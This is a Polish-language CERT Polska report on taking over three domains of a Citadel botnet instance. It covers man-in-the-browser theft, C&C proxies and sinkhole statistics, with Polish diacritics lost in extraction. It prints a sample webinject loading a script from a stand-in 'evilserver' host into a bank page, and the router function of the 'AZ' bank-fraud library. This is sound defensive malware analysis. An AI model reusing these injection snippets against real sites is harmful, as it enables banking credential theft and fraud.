You are on page 1of 19

Raport

Przejcie domen instancji plitfi botnetu Citadel

15 kwietnia 2013

SPIS TRECI

Spis treci
1 Streszczenie 2 Botnet Citadel 2.1 Historia . . . . . . . . . . . . . . . . . 2.2 Przejcie domen . . . . . . . . . . . . . 2.3 Opis dziaania . . . . . . . . . . . . . . 2.4 Moliwoci Citadela i jego konguracja 2.5 Ukrywanie serwerw C&C . . . . . . . 2.6 Webinjecty . . . . . . . . . . . . . . . . 2 3 3 3 4 5 5 6 10 10 11

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

. . . . . .

3 Statystyki 3.1 Kwerendy DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.2 Komunikacja botw . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Strona tytuowa Clipart Saint George, ktry jest czci strony tytuowej, jest dostpny w domenie publicznej i zosta pobrany z serwisu clker.com spod adresu: http://www.clker.com/ cliparts/K/Q/Z/X/C/S/saint-george.svg. 1

1 STRESZCZENIE

Streszczenie

W lutym 2013 roku Naukowa i Akademicka Sie Komputerowa oraz dziaajcy w jej strukturach CERT Polska dokonay przejcia kontroli nad trzema nazwami domenowymi z kocwk .pl, sucymi do zarzdzania jedn z instancji botnetu Citadel. Instancja ta suya do wykradania danych przesyanych do serwisw internetowych i bya skierowana gwnie w polskich uytkownikw Internetu. Z zebranych przez CERT Polska informacji wynika, e 11 730 rnych maszyn zostao zainfekowanych tym zoliwym oprogramowaniem. Wikszo pocze do C&C pochodzio z Europy oraz Japonii, przy czym a 77% pocze pochodzio z Polski. Raport ten przedstawia sposb dziaania botnetu, sposb wykradania danych uytkownikw oraz statystyki dotyczce pocze do serwerw C&C.

2 BOTNET CITADEL

Botnet Citadel

Citadel jest nazw zoliwego oprogramowania, ktre powstao na bazie opublikowanego kodu rdowego bota Zeus.

2.1

Historia

W lipcu 2007 roku po raz pierwszy zidentykowano zoliwe oprogramowanie, ktre pniej zostao nazwane Zeus. Do 2010 roku specjalici zajmujcy si bezpieczestwem sieci zauwayli wzmoon aktywno tego oprogramowania. 1 padziernika 2010 roku FBI zidentykowao jedn z grup przestpczych wykorzystujcych Zeusa, aby wykra okoo 70 milionw dolarw uywajc danych przesanych przez to oprogramowanie. Jednym ze sposobw rozprzestrzeniania si byy wiadomoci zawierajce phishing wysyane zarwno przez portal spoecznociowy Facebook jak i poprzez poczt e-mail. W 2011 roku kod rdowy Zeusa wyciek i zosta opublikowany. Od tego czasu, na jego bazie, powstao wiele rnych mutacji, z ktrych jedn jest Citadel. Model biznesowy botnetu Citadel jest diametralnie rny od opisywanego wczeniej Viruta1 . Przestpcy, ktrzy tworz Citadela, odsprzedaj oprogramowanie (tzw. crimeware pack ) zawierajce program budujcy malware oraz panel kontrolny botnetu. Nastpnie klienci sami dbaj o zainfekowanie maszyn oraz zbieranie i wykorzystywanie danych. Cay crimeware pack w wersji 1.3.4.5 (opisywanej w tym raporcie) zosta opublikowany w 2012 roku, co pozwolio na dokadn analiz dziaania botnetu.

2.2

Przejcie domen

W lutym 2013 CERT Polska zidentykowa jeden z botnetw, o nazwie plitfi, opartych o zoliwe oprogramowanie Citadel, zarzdzany przez trzy domeny z kocwk .pl: infocyber.pl secblog.pl online-security.pl 27 lutego 2013 r., na podstawie zebranych danych, NASK dokona zmiany statusu tych domen w rejestrze na Server Hold. Status taki uniemoliwia propagacj danych do serwerw nazw oraz wprowadzanie zmian przez klienta lub registrara i moe by nakadany przez rejestr domen w przypadku wtpliwoci prawnych. Poniewa powysze domeny wykorzystywane byy do dziaalnoci jednoznacznie szkodliwej dla uytkownikw sieci Internet, a dane abonentw okazay si faszywe, 7 marca 2013 r. NASK przej wszystkie trzy nazwy domenowe i zmieni ich delegacje na serwer nazw kontrolowany przez CERT Polska (sinkhole112.cert.pl).
Raport dotyczcy przejcia domen botnetu Virut mona znale pod adresem http://www.cert. pl/PDF/Raport_Virut_PL.pdf
1

2 BOTNET CITADEL

2.3

Opis dziaania

Po zainfekowaniu maszyny malware wstrzykuje si do jednego z procesw dziaajcych w systemie operacyjnym uytkownika, co pozwala mu na uniknicie szybkiego wykrycia. Nastpnie wstrzykuje si we wszystkie procesy, wczajc w to proces przegldarki internetowej (tzw. atak man in the browser ), aby kontrolowa informacje jakie docieraj do uytkownika i mc je przechwyci. Na rysunku 1 przedstawiony jest schemat takiego ataku. Na pocztku, uytkownik wprowadza swj login oraz haso do jednej z interesujcych atakujcego stron. Dane te s wysyane (zielone strzaki) do serwera, tak jak to si dzieje w przypadku normalnego uywania stron internetowych. Zoliwe oprogramowanie jednak kopiuje danie HTTP i wysya je (czerwone strzaki) do serwera kontrolujcego komputery botnetu (z ang. Command and Control, w skrcie C&C). Dziki temu atakujcy uzyskuje dostp do danych logowania oary. Zauwamy, i nie ma znaczenia czy poczenie miedzy komputerem oary a serwerem jest szyfrowane czy nie zoliwe oprogramowanie ma dostp do treci komunikacji przed jego zaszyfrowaniem. Jednak przechwycenie hasa nie zawsze jest jedynym celem realizowanym poprzez atak tego typu. Przestpca, poniewa znajduje si w przegldarce oary jest w stanie rwnie kontrolowa zawarto strony prezentowan uytkownikowi. Umoliwia to wywietlenie treci nie pochodzcych z serwera, z ktrym oara si kontaktuje. Moe to suy np. nakonieniu uytkownika do przekazania hasa jednorazowego lub podmianie reklam serwowanych na danej stronie na takie, na ktrych zarabia przestpca.

Rysunek 1: Schemat ataku man in the browser 4

2 BOTNET CITADEL

2.4

Moliwoci Citadela i jego konguracja

Przechwytywanie danych logowania oraz zmienianie zawartoci stron internetowych to tylko cz moliwoci Citadela. Komunikacja oraz konguracja przysyana przez serwer C&C jest szyfrowana za pomoc zarwno AES jak i szyfru RC4, co utrudnia analiz ruchu sieciowego oraz prby podsuchania wymiany danych. Bot, po zainfekowaniu systemu, kontaktuje si z serwerem przestpcy w celu pobrania konguracji. W konguracji, dla kadego adresu internetowego, zdeniowana s akcje, ktre malware ma wykona gdy uytkownik odwiedza stron. Moliwe akcje to: 1. Ignorowanie danych logowania wprowadzonych na tej stronie. Dane takie nie s wtedy przesyane na serwer atakujcego. Ograniczenie to jest wprowadzane, gdy uytkownicy czsto odwiedzaj dan stron internetow, ale przestpca uzna, e nie jest w stanie zarobi na informacjach z niej gromadzonych. 2. Przekierowanie danej domeny na inny adres IP. Atakujcy w ten sposb blokuje dostp uytkownikowi do stron, ktre zawieraj informacje dotyczce np. usunicia zoliwego oprogramowania, albo do aktualizacji bazy oprogramowania antywirusowego zainstalowanego na komputerze oary. 3. Podejrzenie i nagranie aktywnoci uytkownika. Umoliwia to zarwno wykonanie zrzutu ekranu z maszyny oary jak i nagranie lmu z aktywnoci zarejestrowan na komputerze atakowanego. Pozwala to na przechwycenie danych logowania, gdy uytkownik proszony jest o podanie czci hasa, albo podanie znakw hasa w okrelonej kolejnoci. 4. Wstrzykiwanie kodu do stron internetowych. Umoliwia to podszycie si pod np. stron banku i przekonanie uytkownika do wykonania akcji, ktra doprowadzi do przekazania pienidzy przestpcy. W celu rozszerzenia moliwoci konguracyjnych, kady adres internetowy jest wyraony za pomoc wyrae regularnych (wykorzystujc do tego PCRE, czyli Perl Compatible Regular Expressions ). Dodatkowo, kady bot otrzymuje zapasowy adres serwera C&C, na ktrym znajdzie konguracj, w przypadku gdy podstawowy adres przestanie dziaa.

2.5

Ukrywanie serwerw C&C

Architektura botnetu Citadel korzystaa z serwerw porednich w dostpie do waciwego serwera C&C. Za kadym razem gdy zainfekowana maszyna prbuje poczy si z wpisan w jej konguracji domen (np. infocyber.pl) musi wybra jeden z adresw IP z ni zwizanych. Najczciej jest to pierwszy adres IP na licie odpowiedzi serwera DNS. Nastpnie przesya pod ten adres IP zgromadzone dane oraz pobiera od niego instrukcje. Ten adres odpowiada jednemu z serwerw oznaczonych na rysunku 2 jako Proxy Poziom 1. Jest to maszyna, z ktr bezporednio komunikuje si komputer oary.

2 BOTNET CITADEL

Z ustale zespou CERT Polska wynika, e serwery te zostay przejte w wyniku wamania. Na kadym z serwerw poziomu 1 znajduje si oprogramowanie, ktre przekierowuje wszystkie dania HTTP do jednego z serwerw oznaczonych jako Proxy Poziom 2. Analogicznie, kada z tych maszyn przekierowuje dania do waciwego serwera C&C, ktry je przetwarza i t sam drog przesya odpowied. Dziki zastosowaniu tego rozwizania zidentykowanie oraz zablokowanie waciwych C&C jest znacznie utrudnione. Na dodatek, dziki znacznej liczbie maszyn w warstwie pierwszej i drugiej, utrudnione jest nawet okrelenie ile serwerw C&C, a w konsekwencji ile botnetw, obecnie dziaa w Internecie.

Rysunek 2: Architektura proxy do C&C

2.6

Webinjecty

Wstrzykiwanie zoliwego kodu do strony WWW okrelane jest w konguracji botnetu Citadel sowem webinject. Doczony do strony kod HTML jest interpretowany przez przegldark tak jakby si tam znajdowa, co pozwala na przykad zaczy dodatkowy skrypt jzyka JavaScript, ktry zostanie pobrany z zewntrznego serwera. Na listingu 1 zaprezentowana jest przykadowa konguracja botnetu. Po otrzymaniu takiego wpisu, kiedy uytkownik wejdzie na stron, ktrej adres zaczyna si od http://nasz.internetowy.bank/ to pomidzy znacznikiem head a kocem znacznika body zostanie umieszczony kod HTML zawarty w sekcji data_inject.
Target URL : "http://nasz.internetowy.bank/*" data_before <html*xmlns*>*<head> data_after </body> data_inject

2 BOTNET CITADEL

<script type="text/javascript" src="https://evilserver.example.com/grabmoney.js"> </script>

Listing 1: Przykadowy webinject. Dziki takiej konguracji botnetu moliwe jest, zamiast wykorzystania jednego miejsca, gdzie zbierane s dane (tzw. dropzone ), wykorzystanie kilku maszyn, ktre zbieraj dane z rnych adresw URL. W pliku konguracyjnym przewanie znajdowa si tylko krtki fragment kodu HTML, ktry powodowa wywoanie skryptu w jzyku JavaScript. Skrypt taki, w przypadku polskich instytucji nansowych, zawiera bibliotek AZ 2 (nazywan tak od zmiennych uywanych w kodzie) oraz wywoanie z niej funkcji, dostosowane do konkretnego banku. Biblioteka ta, skadajca si z 2500 3000 linii kodu, ma bardzo rnorodn funkcjonalno, dostosowan do dziaalnoci przestpczej. Pozwalaa ona midzy innymi na: Przesyanie komunikatw HTTP metodami POST i GET. Dziki temu przestpcy mogli przesya dane pomidzy serwerem banku a kontrolowan przez nich maszyn. Pozwala to na wykradzenie danych logowania, jak rwnie przesyanie komend, ktre maj zosta wykonane. Raportowanie bdw oraz ledzenie postpu przestpstwa. Umoliwia to przestpcom bardzo dokadne ledzenie uytkownikw oraz przebiegu wykonywanych przez nich akcji. Dowolna zmiana wygldu strony banku. Pozwala to na wywietlanie informacji z prob o wykonanie przelewu, ktra wyglda dokadnie jakby pochodzia z banku. Poniej, na listingu 2 zaprezentowany jest kod gwnej funkcji biblioteki AZ. Jest to funkcja odpowiedzialna za przeprowadzenie kolejnych etapw ataku oraz obsug bdw.
1 function Router(stagesTable, loggedInNode) { 2 switch (typeof loggedInNode) { 3 case string: 4 loggedInNode = getNodeN(loggedInNode); 5 break; 6 case function : 7 loggedInNode = loggedInNode(); 8 break; 9 default: 10 } 11 if (!loggedInNode) { 12 if (window.az7.is_confirmed) { 13 logout(); 14 window.az7.is_confirmed = false; 15 } 16 unlockHolder(); 17 return false; 18 }
2

Firma TrendMicro okrela ten typ kodu JavaScript skrtem ATS Automatic Transfer System.

2 BOTNET CITADEL

19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 }

logger.info(Router started, {stage:window.az7.stage}); if (!window.az7.stage || window.az7.stage == fail || window.az7.stage == success) { unlockHolder(); return false; } var currentStageHandler = stagesTable[window.az7.stage]; if (typeof currentStageHandler == undefined || !stagesTable.hasOwnProperty (window.az7.stage)) { fail("script_error", {message:"Unknown stage found",param:window. az7.stage}); unlockHolder(); return false; } if (typeof currentStageHandler != function) { fail("script_error", { message:"Stage handler is not a function", stage:window.az7.stage, param:currentStageHandler.toString() }); unlockHolder(); return false; } if (Router.timeout) { clearTimeout(Router.timeout); } Router.timeout = setTimeoutWrapped(function () { logger.log(Calling stage , window.az7.stage, handler...); currentStageHandler.call(); }, parseInt(3500 + Math.random() * 2000)); return true;

Listing 2: Funkcja sterujca. Biblioteka AZ najczciej bya wykorzystywana do tego, aby przekona oar, e na jej koncie zosta zaksigowany bdny przelew. Nastpnie wywietla si komunikat informujcy o tym, e bdnie przelan kwot naley zwrci na pewne konto, ktre byo zwizane z przestpcami. Przykad takiego komunikatu znajduje si na rysunku 3. W celu uwiarygodnienia takiej informacji saldo konta oary zostao zwikszone o bdnie przelan kwot oraz komunikat zosta dostosowany do wygldu serwisu transakcyjnego banku. Komunikat taki by wywietlany tylko wybranym wczeniej klientom.

2 BOTNET CITADEL

Rysunek 3: Przykadowy komunikat o rzekomo bdnym przelewie.

Na przestrzeni kilku miesicy obserwowania przejtej instancji botnetu Citadel CERT Polska zidentykowa rne domeny, na ktrych znajdowaa si biblioteka AZ. Z naszych obserwacji wynika, e w okresie od lutego do marca 2013 wykorzystywana bya domena online-security.pl. W caym okresie monitorowania wykorzystania biblioteki AZ bylimy w stanie zidentykowa skrypty atakujce klientw 13 polskich instytucji nansowych oraz co najmniej kilku zagranicznych. Pochodziy one z kilku rnych domen w domenach najwyszego poziomu .com oraz .pl.

3 STATYSTYKI

Statystyki

Poniej prezentujemy, zebrane w wyniku przejcia domen, statystyki pocze dochodzcych do serwera sinkhole.

3.1

Kwerendy DNS

Ze wzgldu na specyk systemu nazw, w logach serwera DNS znajdujcego si na sinkholeu znajduj si adresy serwerw DNS-Resolver, ktre pytay o domeny zwizane z botnetem Citadel. Naley je rozrni od adresw zainfekowanych maszyn czsto z jednego DNS-Resolvera korzysta znaczna liczba maszyn. Na wykresie 4 przedstawiona jest liczba unikalnych adresw IP maszyn pytajcych o domeny botnetu Citadel. Przejcie zostay trzy domeny: infocyber.pl, secblog.pl oraz online-security.pl, ktre naleay do jednej instancji botnetu. Zapytania o te domeny stanowi 99,99% wszystkich zapyta DNS kierowanych do serwera. Pomidzy 11 a 28 marca 2013 roku serwer obsuy 1 472 946 kwerend zwizanych z botnetem.
DNS : uniq IP 4000 Hourly Daily avg

3500

3000

2500

2000

1500

1000

500

0 2013 11/03

2013 13/03

2013 15/03

2013 17/03

2013 19/03

2013 21/03

2013 23/03

2013 25/03

2013 27/03

Rysunek 4: Liczba unikalnych adresw IP wykonujcych kwerendy DNS Serwer DNS, podobnie jak w przypadku sinkholea botnetu Virut, zosta skonguro10

3 STATYSTYKI

wany w ten sposb, aby odpowiada tylko na kwerendy o rekord A oraz rekord NS. Kada inna kwerenda skutkuje odpowiedzi NXDOMAIN. Na rysunku 5 przedstawiono stosunek zapyta o rekordy A w stosunku do zapyta o pozostae rekordy.
% NXdomain % Resolved 100

80

[% of queries]

60

40

20

1 20 3/ /0 11 3

Rysunek 5: Stosunek odpowiedzi NXDOMAIN do pozostaych

1 20 3/ /0 13 3

1 20 3/ /0 15 3

1 20 3/ /0 17 3

1 20 3/ /0 19 3

1 20 3/ /0 21 3

1 20 3/ /0 23 3

1 20 3/ /0 25 3

1 20 3/ /0 27 3

3.2

Komunikacja botw

Zoliwe oprogramowanie tworzyo dla kadej maszyny osobny identykator, ktry nastpnie by przesyany do C&C. Dziki temu przedstawione poniej statystyki nie powstay tylko na podstawie rdowych adresw IP, ale take na podstawie identykatorw botw. Identykatory pozwalaj na dokadne oszacowanie wielkoci botnetu, podczas gdy adresy IP posuyy do ustalenia lokalizacji maszyn oraz systemw autonomicznych, do ktrych nale. Na podstawie informacji przekazanych przez boty moglimy ustali stron kodow i wersj systemu operacyjnego. Od 11 marca do 4 kwietnia 2013 zaobserwowalimy 11 730 rnych identykatorw botw, ktre nawizay poczenie z sinkholem. Poczenia te pochodziy z 164 323 unikalnych adresw IP rozmieszczonych w 75 rnych krajach. Najwicej pocze zaobserwowano z adresw IP pochodzcych z Polski (prawie 78%), Japonii oraz Szwecji. rednio dziennie obserwowalimy poczenia z 8 013 rnych komputerw (z 13 235 unikalnych 11

3 STATYSTYKI

adresw IP). W tabeli 1 znajduje si pierwsza dziesitka krajw, z ktrych najczciej pochodziy poczenia. Kraj Liczba adresw IP Udzia procentowy 1. Polska 127 453 77,56% 2. Japonia 14 401 8,76% 3. Szwecja 8 716 5,30% 4. Dania 2 842 1,73% 5. Wochy 2 788 1,70% 6. Szwajcaria 1 790 1,09% 7. Hiszpania 1 392 0,85% 8. Estonia 1 389 0,85% 9. Niemcy 621 0,38% 10. Holandia 486 0,29% Tabela 1: Kraje, z ktrych pochodzio najwicej pocze Na rysunku 6 przedstawione jest geograczne rozmieszczenia adresw IP czcych si z sinkholem. Jak wida botnet gwnie skierowany by przeciwko krajom europejskim oraz Japonii. Na rysunku 7 wida rozmieszenie adresw IP w Europie zgodnie z zaprezentowan wczeniej tabel, ta instancja botnetu wymierzona bya gwnie w obywateli Polski.

100

200

300

400

500

600

700

800

900 1000

Rysunek 6: Rozmieszczenie geograczne zainfekowanych adresw IP na wiecie

12

3 STATYSTYKI

1000 900 800 700 600 500 400 300 200 100
Rysunek 7: Rozmieszczenie geograczne zainfekowanych adresw IP w Europe Poczenia nawizane z Polski pochodziy z 512 rnych systemw autonomicznych. W tabeli 8 prezentujemy 10 polskich sieci, z ktrych najwiksza liczba unikalnych adresw IP nawizaa poczenie z sinkholem. Zgodnie z oczekiwaniami najwicej pocze zostao nawizanych z sieci najwikszego polskiego operatora. Liczba adresw IP 1 42 140 2 30 665 3 12 281 4 11 093 5 10 838 6 7 464 7 3 262 8 2 060 9 1 074 10 966 ASN AS5617 AS12912 AS12741 AS39603 AS43447 AS8374 AS15855 AS21021 AS29314 AS6830 Nazwa Telekomunikacja Polska S.A. Polska Telefonia Cyfrowa S.A. Netia SA P4 Sp. z o.o. PTK Centertel Sp. z o.o. Polkomtel Sp. z o.o. Aero 2 sp. z o.o. Multimedia Polska S.A. VECTRA S.A. UPC Broadband Holding B.V.

Tabela 2: Lista polskich sieci z najwiksz liczb pocze. Wykres 8 przedstawia udzia poszczeglnych systemw autonomicznych w zaobserwowanych poczeniach. 13

3 STATYSTYKI

45000 40000 35000 30000 25000 20000 15000 10000 5000 0

AS

56

AS 17

12

AS 91 2

12

74

AS AS AS AS AS AS AS 39 43 83 15 21 29 68 60 44 74 85 02 31 30 3 7 5 1 4

Rysunek 8: Autonomiczne sieci z najwiksz liczb pocze

Tabela 3 poniej prezentuje 3 zagraniczne autonomiczne systemy, z ktrych pochodzio najwicej pocze. Ta instancja botnetu kierowana bya gwnie w polskich uytkownikw, dlatego z najczciej wystpujcego zagranicznego systemu autonomicznego pochodzio zaledwie 1,8% adresw IP. Liczba adresw 1 3 042 2 2 652 3 2 519 ASN AS4713 AS37903 AS44034 Nazwa NTT Communications Corporation eMobile Ltd. Hi3G Access AB Kraj Japonia Japonia Szwecja

Tabela 3: Lista zagranicznych sieci z najwiksz liczb pocze. Kady z zainfekowanych komputerw przesya informacj o ustawionej stronie kodowej. Dziki temu bylimy w stanie dokadniej ustali ile rnych maszyn, a nie adresw IP, pochodzio z poszczeglnych krajw. Tabeli 4 prezentuje 10 najczciej wystpujcych stron kodowych. Najwiksza liczba nazw botw ma ustawiony jako jzyk systemowy, zgodnie z wczeniejszymi danymi, polski (58%). Kolejnymi czsto spotykanymi jzykami okazay si: japoski (14%) oraz szwedzki (8%). Wystpowania jzyka angielskiego (5% nazw botw) nie mona bezporednio powiza z iloci zainfekowanych komputerw w Stanach Zjednoczonych, gdy jest to czsto domylny jzyk systemowy niektrych kopii systemu Windows. Rwnie niewielka liczba adresw IP ze Stanw Zjednoczonych 14

3 STATYSTYKI

jakie nawizay poczenie z sinkholem moe potwierdza, e maszyny te niekoniecznie znajduj si na terytorium USA. Liczba botw Numer strony kodowej 6 809 1045 1 677 1041 912 1053 640 1033 587 1030 301 1031 268 1043 185 3082 73 1040 61 1029 Opis polski japoski szwedzki angielski (Stany Zjednoczone) duski niemiecki holenderski hiszpaski woski czeski

1 2 3 4 5 6 7 8 9 10

Tabela 4: 10 najczciej wystpujcych stron kodowych Wykres 9 przedstawia udzia poszczeglnych stron kodowych we wszystkich poczeniach.
7000

6000

5000

4000

3000

2000

1000

10

45

10 (P oli

41 )

sh

(Ja

10 10 10 10 30 10 10 33 30 31 43 82 40 29 (E (D (G (D (S (Ita (C Sw n p a u ze e pa l g a n t r i e c a m ch l n i dis ish sh hS n ne i a s ) ) n) hM ) h) se U t a nit ) n o d de ed ard rn) Sta ) tes ) 3(

10 5

Rysunek 9: 10 najczciej wystpujcych stron kodowych

15

3 STATYSTYKI Liczba botw 4 389 4 373 2 417 1 575 77 7 Wersja systemu operacyjnego Windows 7, wersja 64 bitowa Windows XP, wersja 32 bitowa Windows 7, wersja 32 bitowa Windows Vista, wersja 32 bitowa Windows Vista, wersja 64 bitowa Inne

1 2 3 4 5

Tabela 5: Najczciej wystpujce systemy operacyjne Boty przesyay rwnie informacje o wersji systemu operacyjnego znajdujcego si na zainfekowanej maszynie. Zaobserwowalimy 28 rnych wersji, wliczajc w to rwne dodatki typu Service Pack jak rwnie rne architektury procesora. Wszystkie systemy operacyjne pochodziy z rodziny Microsoft Windows. Najczciej spotykanym, zgodnie oczekiwaniami, okaza si Windows 7, ktry znajdowa si na 53% maszyn. Kolejnym czsto spotykanym systemem by Windows XP (ponad 34%). Pozostae systemy stanowiy niecae 13%. Wyniki zostay zaprezentowane w tabeli 5. W tabeli, w celu poprawienia jej czytelnoci, nie rozrnialimy rnych dodatkw Service Pack.
4500 4000 3500 3000 2500 2000 1500 1000 500 0

Wi nd ow sS

Wi Wi Ot he nd nd r ow ow ow sX sS sV sV ev P3 ev ist ist a3 a6 en en 2b 2b 4b 64 32 it it it bit bit ow nd

Wi nd

Wi

Rysunek 10: Najczciej wystpujce systemy operacyjne

16

3 STATYSTYKI

Zoliwe oprogramowanie przesyao wszystkie dania POST kierowane do serwisw, poza tymi, ktre byy ignorowane na podstawie konguracji podanej przez serwer. dania POST, ktre byy kopiowane do serwera C&C botnetu Citadel, dotyczyy 2 706 unikalnych nazw domenowych, bd adresw IP. Najwicej z nich dotyczyo domen znajdujcych si w obrbie domeny najwyszego poziomu .com (prawie 35%) oraz .pl (prawie 26%). Wyniki dla 10 najczciej wystpujcych domen najwyszego poziomu do ktrych boty wysyay dane przedstawiamy w tabeli 6. Domena najwyszego poziomu Liczba botw 1. .com 947 2. .pl 696 3. .jp 185 4. .net 111 5. .se 109 6. .dk 99 7. .ru 47 8. .ch 46 9. .nl 36 10. .it 31 Tabela 6: Najczciej wystpujce domeny najwyszego poziomu Informacje z da POST, przesyane przez boty do C&C pogrupowalimy w zalenoci od charakteru serwisu jakie dotyczyy przesyane dane. Wyrnilimy 8 grup, ktre mogy zawiera dane dotyczce logowania. Grupy te zostay opisane poniej. 1. Serwisy nansowe takie jak strony internetowe bankw czy serwisy poredniczce w patnociach. W tej grupie znajduj si 82 nazwy domenowe. 2. Dostawcy usug pocztowych (e-mail) w tej grupie znajduje si 95 nazw domenowych. 3. Serwisy spoecznociowe w tej grupie znajduje si 95 nazw domenowych. 4. Serwisy aukcyjne w tej grupie znajduje si 18 nazw domenowych. 5. Serwisy informacyjne w tej grupie znajduje si 57 nazw domenowych. 6. Serwisy umoliwiajce wymian plikw w tej grupie znajduje si 5 nazw domenowych. 7. Inne popularne serwisy w tej grupie znajduje si 37 nazw domenowych. 8. Domeny zwizane ze zoliwym oprogramowaniem. S to informacje pochodzce z innego zoliwego oprogramowania znajdujcego si na zainfekowanej maszynie. Domeny zwizane byy m.in. z innymi instancjami Citadela bd z Torpigiem. W tej grupie znajduje si 739 nazw domenowych. 17

3 STATYSTYKI Grupa 1 2 3 4 5 6 7 8 Typ stron Polska Zagranica Serwisy nansowe 248 155 Dostawcy usug pocztowych 321 225 Serwisy spoecznociowe 260 99 Serwisy aukcyjne 314 127 Serwisy informacyjne 571 23 Wymiana plikw 41 8 Inne serwisy 1703 693 Zoliwe nazwy domenowe 517 479

Tabela 7: Liczba botw jakie odwoyway si do danej grupy serwisw Tabela 7 oraz wykres 11 prezentuj liczb botw, ktre wykonay dania POST, dotyczce danej grupy serwisw. Dla kadego bota zostaa rwnie ustalona strona kodowa jzyka na tej podstawie boty zostay podzielone na polskie oraz te pochodzce z zagranicy.
1800 1600 1400 1200 1000 800 600 400 200 0
Se rw Do sta an so Se wc yu Se Se Wy Inn Zo rw rw liw es mi isy isy an erw en ap sp au inf i az s o o k l y su ik ec cy rm wy jne gp w ac zn do yjn o oc me cio e zto no we wy we ch rw isy

PL inne

isy

fin

we

Rysunek 11: Liczba botw jakie odwoyway si do danej grupy serwisw

18